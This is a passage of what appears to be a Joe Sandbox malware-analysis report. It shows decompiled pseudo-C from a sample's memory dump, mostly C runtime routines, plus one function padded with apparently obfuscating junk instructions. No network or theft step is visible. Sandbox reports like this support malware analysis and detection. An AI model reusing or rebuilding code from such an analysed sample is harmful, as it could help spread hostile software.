						if(( *0x42a760 & 0x00000001) == 0) {
							 *0x42a760 =  *0x42a760 | 0x00000001;
							__eflags =  *0x42a760;
							E004067B2(L"cription");
							E004079C2( *0x42a760, 0x4175ab);
						}
						E00402200( &_v16, _t28);
						E00404EFB( &_v16, 0x424938);
						asm("int3");
						return E0040BFB0(_t26, _t27, _t28, _v12, _v8, _v4, 0,  &_v0);
					} else {
						continue;
					}
					L8:
				}
				return _t11;
				goto L8;
			}













                                                                                                                                                                                                        0x004067cd
                                                                                                                                                                                                        0x004067cd
                                                                                                                                                                                                        0x004067cd
                                                                                                                                                                                                        0x004067e4
                                                                                                                                                                                                        0x004067e7
                                                                                                                                                                                                        0x004067ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004067da
                                                                                                                                                                                                        0x004067e0
                                                                                                                                                                                                        0x004067e2
                                                                                                                                                                                                        0x004067f3
                                                                                                                                                                                                        0x004067fa
                                                                                                                                                                                                        0x004067ff
                                                                                                                                                                                                        0x00406801
                                                                                                                                                                                                        0x00406801
                                                                                                                                                                                                        0x0040680a
                                                                                                                                                                                                        0x00406814
                                                                                                                                                                                                        0x00406819
                                                                                                                                                                                                        0x0040681e
                                                                                                                                                                                                        0x0040682c
                                                                                                                                                                                                        0x00406831
                                                                                                                                                                                                        0x0040684f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004067e2
                                                                                                                                                                                                        0x004067f2
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 004067E7
                                                                                                                                                                                                          • Part of subcall function 0040BC7F: __FF_MSGBANNER.LIBCMT ref: 0040BCA2
                                                                                                                                                                                                          • Part of subcall function 0040BC7F: __NMSG_WRITE.LIBCMT ref: 0040BCA9
                                                                                                                                                                                                          • Part of subcall function 0040BC7F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A4A3,00000010,00000001,00000010,?,0040D618,00000018,00425108,0000000C,0040D6A9), ref: 0040BCF6
                                                                                                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040680A
                                                                                                                                                                                                          • Part of subcall function 004067B2: std::exception::exception.LIBCMT ref: 004067BE
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMTD ref: 0040681E
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040682C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1411284514-0
                                                                                                                                                                                                        • Opcode ID: 8585b3583b7bf29962c41642d1b4ddf261133dab2558048dd3e98995984e04be
                                                                                                                                                                                                        • Instruction ID: 0feaa45654ace7a4f6b28d2a44f09bc668b201aed8f0e173d8143faa04877f43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8585b3583b7bf29962c41642d1b4ddf261133dab2558048dd3e98995984e04be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF0277160021963DB147731EC46A593B68DF8071CB65803FFC02760E2DF7CDA66818E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040C55F Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 204 40c55f-40c570 call 40c534 ExitProcess
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040C55F(int _a4) {

				E0040C534(_a4);
				ExitProcess(_a4);
			}



                                                                                                                                                                                                        0x0040c567
                                                                                                                                                                                                        0x0040c570

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040C567
                                                                                                                                                                                                          • Part of subcall function 0040C534: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040C56C,00000010,?,0040BCB8,000000FF,0000001E,?,0040A4A3,00000010,00000001,00000010,?,0040D618,00000018), ref: 0040C53E
                                                                                                                                                                                                          • Part of subcall function 0040C534: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C54E
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040C570
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                                                        • Opcode ID: 24d4ed759d2685e80b25e6e6d628a1a91acc0d1db33d70efe3c10bff94b60432
                                                                                                                                                                                                        • Instruction ID: 9fe053e8174d457a90ec2405e1741ee39fb6a4e09af935964ea4377df9f5121e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24d4ed759d2685e80b25e6e6d628a1a91acc0d1db33d70efe3c10bff94b60432
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81B09231000148BFCB112F12EC0A8493F6AEB803A1B944036F90809071DF72AED2DAC8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041DD00 Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 207 41dd00-41dd4a call 4011a0 call 41df60 212 41dd7d 207->212 213 41dd4c-41dd61 call 41df60 207->213 215 41dd84-41dda3 call 41d9d0 call 41daa0 212->215 213->212 218 41dd63-41dd7b call 41df60 213->218 224 41ddb3-41ddd2 call 41d420 215->224 225 41dda5-41ddae 215->225 218->215 231 41ddd4 224->231 232 41de3f-41de43 224->232 226 41df21-41df58 call 41d690 call 41da70 225->226 234 41dddf-41dde3 231->234 235 41de45-41de61 call 41d6c0 call 41e170 232->235 236 41de74-41de78 232->236 234->232 239 41dde5-41de30 call 41d900 call 41d6c0 call 41d940 call 4010b0 call 401090 234->239 251 41de66-41de69 235->251 240 41dee5-41df1a call 41df80 236->240 241 41de7a 236->241 269 41de32-41de3b 239->269 270 41de3d 239->270 240->226 245 41de85-41de89 241->245 245->240 249 41de8b-41ded6 call 41d900 call 41d6c0 call 41d940 call 4010b0 call 401090 245->249 274 41dee3 249->274 275 41ded8-41dee1 249->275 251->236 255 41de6b-41de71 251->255 255->236 269->232 270->234 274->245 275->240
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E0041DD00(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _t84;
				signed int _t89;
				signed char _t99;
				signed char _t104;
				void* _t108;
				signed int _t110;
				signed char _t111;
				signed char _t117;
				signed int _t119;
				void* _t125;
				signed int _t156;
				intOrPtr _t197;
				intOrPtr _t198;
				void* _t199;

				_push(0xffffffff);
				_push(E00420170);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t197;
				_push(__ecx);
				_t198 = _t197 - 0x2c;
				_v20 = _t198;
				_v24 = 0;
				_t84 = E004011A0(_a8);
				_t199 = _t198 + 4;
				_v28 = _t84;
				if(E0041DF60(_a4 +  *((intOrPtr*)( *_a4 + 4))) <= 0) {
					L3:
					_v64 = 0;
				} else {
					_t125 = E0041DF60(_a4 +  *((intOrPtr*)( *_a4 + 4)));
					_t201 = _t125 - _v28;
					if(_t125 <= _v28) {
						goto L3;
					} else {
						_v64 = E0041DF60(_a4 +  *((intOrPtr*)( *_a4 + 4))) - _v28;
					}
				}
				_v32 = _v64;
				E0041D9D0( &_v40, _t201, _a4);
				if((E0041DAA0( &_v40) & 0x000000ff) != 0) {
					_v8 = 0;
					_t89 = E0041D420(_a4 +  *((intOrPtr*)( *_a4 + 4)));
					__eflags = (_t89 & 0x000001c0) - 0x40;
					if((_t89 & 0x000001c0) != 0x40) {
						while(1) {
							__eflags = _v32;
							if(_v32 <= 0) {
								goto L13;
							}
							_t111 = E0041D900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
							_v44 = E0041D940(E0041D6C0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _t111 & 0x000000ff);
							_v48 = E004010B0(_t114);
							_t117 = E00401090( &_v48,  &_v44);
							_t199 = _t199 + 8;
							__eflags = _t117 & 0x000000ff;
							if((_t117 & 0x000000ff) == 0) {
								_t119 = _v32 - 1;
								__eflags = _t119;
								_v32 = _t119;
								continue;
							} else {
								_v24 = _v24 | 0x00000004;
							}
							goto L13;
						}
					}
					L13:
					__eflags = _v24;
					if(_v24 == 0) {
						_t108 = E0041E170(E0041D6C0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _a8, _v28); // executed
						__eflags = _t108 - _v28;
						if(_t108 != _v28) {
							_t110 = _v24 | 0x00000004;
							__eflags = _t110;
							_v24 = _t110;
						}
					}
					__eflags = _v24;
					if(_v24 == 0) {
						while(1) {
							__eflags = _v32;
							if(_v32 <= 0) {
								goto L23;
							}
							_t99 = E0041D900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
							_v52 = E0041D940(E0041D6C0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _t99 & 0x000000ff);
							_v56 = E004010B0(_t102);
							_t104 = E00401090( &_v56,  &_v52);
							_t199 = _t199 + 8;
							__eflags = _t104 & 0x000000ff;
							if((_t104 & 0x000000ff) == 0) {
								_t156 = _v32 - 1;
								__eflags = _t156;
								_v32 = _t156;
								continue;
							} else {
								_v24 = _v24 | 0x00000004;
							}
							goto L23;
						}
					}
					L23:
					E0041DF80(_a4 +  *((intOrPtr*)( *_a4 + 4)), 0);
					_v8 = 0xffffffff;
				} else {
					_v24 = _v24 | 0x00000004;
				}
				E0041D690(_a4 +  *((intOrPtr*)( *_a4 + 4)), _v24, 0);
				_v60 = _a4;
				E0041DA70( &_v40, _a4 +  *((intOrPtr*)( *_a4 + 4)));
				 *[fs:0x0] = _v16;
				return _v60;
			}






























                                                                                                                                                                                                        0x0041dd03
                                                                                                                                                                                                        0x0041dd05
                                                                                                                                                                                                        0x0041dd10
                                                                                                                                                                                                        0x0041dd11
                                                                                                                                                                                                        0x0041dd18
                                                                                                                                                                                                        0x0041dd19
                                                                                                                                                                                                        0x0041dd1f
                                                                                                                                                                                                        0x0041dd22
                                                                                                                                                                                                        0x0041dd2d
                                                                                                                                                                                                        0x0041dd32
                                                                                                                                                                                                        0x0041dd35
                                                                                                                                                                                                        0x0041dd4a
                                                                                                                                                                                                        0x0041dd7d
                                                                                                                                                                                                        0x0041dd7d
                                                                                                                                                                                                        0x0041dd4c
                                                                                                                                                                                                        0x0041dd59
                                                                                                                                                                                                        0x0041dd5e
                                                                                                                                                                                                        0x0041dd61
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041dd63
                                                                                                                                                                                                        0x0041dd78
                                                                                                                                                                                                        0x0041dd78
                                                                                                                                                                                                        0x0041dd61
                                                                                                                                                                                                        0x0041dd87
                                                                                                                                                                                                        0x0041dd91
                                                                                                                                                                                                        0x0041dda3
                                                                                                                                                                                                        0x0041ddb3
                                                                                                                                                                                                        0x0041ddc5
                                                                                                                                                                                                        0x0041ddcf
                                                                                                                                                                                                        0x0041ddd2
                                                                                                                                                                                                        0x0041dddf
                                                                                                                                                                                                        0x0041dddf
                                                                                                                                                                                                        0x0041dde3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ddf0
                                                                                                                                                                                                        0x0041de10
                                                                                                                                                                                                        0x0041de18
                                                                                                                                                                                                        0x0041de23
                                                                                                                                                                                                        0x0041de28
                                                                                                                                                                                                        0x0041de2e
                                                                                                                                                                                                        0x0041de30
                                                                                                                                                                                                        0x0041ddd9
                                                                                                                                                                                                        0x0041ddd9
                                                                                                                                                                                                        0x0041dddc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041de32
                                                                                                                                                                                                        0x0041de38
                                                                                                                                                                                                        0x0041de38
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041de30
                                                                                                                                                                                                        0x0041dddf
                                                                                                                                                                                                        0x0041de3f
                                                                                                                                                                                                        0x0041de3f
                                                                                                                                                                                                        0x0041de43
                                                                                                                                                                                                        0x0041de61
                                                                                                                                                                                                        0x0041de66
                                                                                                                                                                                                        0x0041de69
                                                                                                                                                                                                        0x0041de6e
                                                                                                                                                                                                        0x0041de6e
                                                                                                                                                                                                        0x0041de71
                                                                                                                                                                                                        0x0041de71
                                                                                                                                                                                                        0x0041de69
                                                                                                                                                                                                        0x0041de74
                                                                                                                                                                                                        0x0041de78
                                                                                                                                                                                                        0x0041de85
                                                                                                                                                                                                        0x0041de85
                                                                                                                                                                                                        0x0041de89
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041de96
                                                                                                                                                                                                        0x0041deb6
                                                                                                                                                                                                        0x0041debe
                                                                                                                                                                                                        0x0041dec9
                                                                                                                                                                                                        0x0041dece
                                                                                                                                                                                                        0x0041ded4
                                                                                                                                                                                                        0x0041ded6
                                                                                                                                                                                                        0x0041de7f
                                                                                                                                                                                                        0x0041de7f
                                                                                                                                                                                                        0x0041de82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ded8
                                                                                                                                                                                                        0x0041dede
                                                                                                                                                                                                        0x0041dede
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ded6
                                                                                                                                                                                                        0x0041de85
                                                                                                                                                                                                        0x0041dee5
                                                                                                                                                                                                        0x0041def2
                                                                                                                                                                                                        0x0041df1a
                                                                                                                                                                                                        0x0041dda5
                                                                                                                                                                                                        0x0041ddab
                                                                                                                                                                                                        0x0041ddab
                                                                                                                                                                                                        0x0041df32
                                                                                                                                                                                                        0x0041df3a
                                                                                                                                                                                                        0x0041df40
                                                                                                                                                                                                        0x0041df4b
                                                                                                                                                                                                        0x0041df58

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 004011A0: _strlen.LIBCMT ref: 004011A7
                                                                                                                                                                                                        • std::ios_base::width.LIBCPMTD ref: 0041DEF2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _strlenstd::ios_base::width
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3171587704-0
                                                                                                                                                                                                        • Opcode ID: e9ebce2433b65021befaeed00c6cc1b85f70666fc95637b79b99a9baf7bc3b05
                                                                                                                                                                                                        • Instruction ID: 546b61e034ceb762cadfded71d656263c09a8c1fcaf6c9b7d8edd0f84c95d12f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9ebce2433b65021befaeed00c6cc1b85f70666fc95637b79b99a9baf7bc3b05
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E8120B5E00209EFCB04DF65C591AEEBBB1FF44358F14811AE506AB351DB38EA81CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040D262 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 277 40d262-40d284 HeapCreate 278 40d286-40d287 277->278 279 40d288-40d291 277->279
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040D262(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x42ac1c = _t6;
				if(_t6 != 0) {
					 *0x42b21c = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                                                                        0x0040d277
                                                                                                                                                                                                        0x0040d27d
                                                                                                                                                                                                        0x0040d284
                                                                                                                                                                                                        0x0040d28b
                                                                                                                                                                                                        0x0040d291
                                                                                                                                                                                                        0x0040d287
                                                                                                                                                                                                        0x0040d287
                                                                                                                                                                                                        0x0040d287

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D277
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                                                        • Opcode ID: 32eedacb91c0ca5d00e12516b8c9a05d987cda7cdd2c733f03c73cb4dae580b6
                                                                                                                                                                                                        • Instruction ID: 31ed7505522818ce638a14f1cd9faab8278572d7838acb46b0b07490664e8efb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32eedacb91c0ca5d00e12516b8c9a05d987cda7cdd2c733f03c73cb4dae580b6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D05E36B943489BDB205FB2BC087663BDCD384395F808476B90CC6690E674C6929B88
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040C77B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 280 40c77b-40c787 call 40c64f 282 40c78c-40c790 280->282
                                                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                                                        			E0040C77B(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040C64F(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                        0x0040c782
                                                                                                                                                                                                        0x0040c784
                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                        0x0040c790

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _doexit.LIBCMT ref: 0040C787
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __lock.LIBCMT ref: 0040C65D
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C694
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6A9
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6D3
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6E9
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6F6
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __initterm.LIBCMT ref: 0040C725
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __initterm.LIBCMT ref: 0040C735
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1597249276-0
                                                                                                                                                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                        • Instruction ID: 7a47cbf55db6954b496256cd15d597979179f47a8b068da45af427d848545b3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DB0923258020C77DA202686AC07F063A0987C0B64E240021BA0C2D1E1A9A3A961808A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040B4A1 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 283 40b4a1-40b4a3 call 40b42f 285 40b4a8-40b4a9 283->285
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040B4A1() {
				void* _t1;

				_t1 = E0040B42F(0); // executed
				return _t1;
			}




                                                                                                                                                                                                        0x0040b4a3
                                                                                                                                                                                                        0x0040b4a9

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __encode_pointer.LIBCMT ref: 0040B4A3
                                                                                                                                                                                                          • Part of subcall function 0040B42F: TlsGetValue.KERNEL32(00000000,?,0040B4A8,00000000,00413B3B,0042A7F8,00000000,00000314,?,0040C982,0042A7F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040B441
                                                                                                                                                                                                          • Part of subcall function 0040B42F: TlsGetValue.KERNEL32(00000005,?,0040B4A8,00000000,00413B3B,0042A7F8,00000000,00000314,?,0040C982,0042A7F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040B458
                                                                                                                                                                                                          • Part of subcall function 0040B42F: RtlEncodePointer.NTDLL(00000000,?,0040B4A8,00000000,00413B3B,0042A7F8,00000000,00000314,?,0040C982,0042A7F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040B496
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2585649348-0
                                                                                                                                                                                                        • Opcode ID: 0f107dd4288dc00ff80855e8c9a1847734dacdce0a6d54d170ca7f962bdcb6ea
                                                                                                                                                                                                        • Instruction ID: 50f6daa7a78768cd96c63fd1e65e43298281fa0e5c7346b119cefa6b879db6cf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f107dd4288dc00ff80855e8c9a1847734dacdce0a6d54d170ca7f962bdcb6ea
                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00419050 Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                                                        			E00419050(void* __eax, char* _a4, intOrPtr _a8) {
				short* _v8;
				short* _v12;
				short* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t45;
				void* _t68;
				void* _t79;

				asm("rcr edi, 0x5f");
				asm("ror eax, 0xc8");
				asm("bswap esi");
				_t72 = _t68 + 1 - 1 + 0x37;
				asm("ror esi, 0x6f");
				asm("rcl edx, 0xc0");
				asm("rol ebx, 0x9f");
				_t39 = (0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d;
				asm("ror edi, 0xbe");
				asm("bswap eax");
				asm("rol ebx, 0x4b");
				asm("ror edx, 0xd0");
				asm("rol edx, 0x6e");
				asm("rol edx, 0x80");
				asm("rcr edx, 0xdf");
				asm("bswap edi");
				asm("rcl edi, 0x6f");
				asm("rcr edi, 0xf3");
				_push(0x2000); // executed
				_t45 = L0040278A(0xfffffffffffffff9,  !(((0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d) * _t39) * ((_t39 * _t39 >> 0x20) - 1) >> 0x20,  !( ~( !( !_t72 - 0x59) & 0x000000ce)), ( !(((0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d) * _t39) * ((_t39 * _t39 >> 0x00000020) - 0x00000001) & 0x000000db) - 0xfc); // executed
				_v12 = _t45;
				_v8 = _v12;
				MultiByteToWideChar(0, 0, _a4, 0xffffffff, _v8, 0x1000);
				E004045A0(0xfffffffffffffff9,  !( ~( !( !_t72 - 0x59) & 0x000000ce)), 0xe4, _a8, _v8, 0x1000);
				_v16 = _v8;
				_push(_v16);
